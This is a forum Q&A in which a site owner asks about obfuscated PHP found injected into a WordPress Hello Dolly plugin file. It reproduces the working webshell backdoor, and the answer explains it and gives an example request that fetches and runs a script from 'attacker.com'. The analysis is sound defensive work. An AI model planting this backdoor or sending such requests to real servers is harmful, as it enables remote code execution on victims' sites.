# How dangerous is this suspicious PHP code?

Tags: malware, php

I found this code on my web server in /wp-content/uploads/2023/index.php:

```
$hello_dolly[]='b8f878fc41d0fd3c';
$hello_dolly[]=$_POST;
$hello_dolly[]='color';
if (isset($hello_dolly[1][$hello_dolly[0]])) {
    $dolly = $hello_dolly[1][$hello_dolly[2]]($hello_dolly[1]['theme']($hello_dolly[1][$hello_dolly[0]]));
    $dolly['themes'] = $dolly['theme']();
    $dolly['footer'] = $dolly['footer']($dolly['themes'])[$dolly['name']];
    $dolly['body']($dolly['themes'], $dolly['color']($dolly['header']));
    require_once($dolly['footer']);
    $dolly['size']($dolly['themes']);
}
```

(It was inserted into presumed-innocent code from https://plugins.trac.wordpress.org/browser/hello-dolly/trunk/hello.php)

I think I've worked out that (among other things), it tries to call `$_POST['color']`, `$_POST['theme']` and `$_POST['footer']` as functions, and if that succeeds, then potentially to execute an arbitrary PHP file with `require_once`.

But is it possible for it to find anything callable from a user-submitted `$_POST` array?

Comment: Unfortunately, we are not a code analysis site. As you can imagine, we'd be flooded with code to interpret.

Answer (score 2, accepted):

The first three lines create an array, with automatically incrementing indices, similar to this:

```
$hello_dolly[0]='b8f878fc41d0fd3c';
$hello_dolly[1]=$_POST;
$hello_dolly[2]='color';
```

This line:

```
$dolly = $hello_dolly[1][$hello_dolly[2]]($hello_dolly[1]['theme']($hello_dolly[1][$hello_dolly[0]]));
```

Is thus equivalent to:

```
$dolly = $_POST['color']($_POST['theme']($_POST['b8f878fc41d0fd3c']));
```

This performs two function calls. It calls the function in post variable `theme` with one argument from post variable `b8f878fc41d0fd3c`. Then it passes that output to the function named in post variable 'color.

So this makes it possible to execute arbitrary PHP functions, and execute any code remotely. It is thus very dangerous.

It could be exploited by posting something like:

- color = `system`
- theme = `file_get_contents`
- b8f878fc41d0fd3c = `https://attacker.com/payload.sh`

Which will call `system(file_get_contents('https://attacker.com/payload.sh'))`, thus executing a malicious shell script.

Comment: Ah OK, thanks.  I didn't realise PHP strings could work as function names.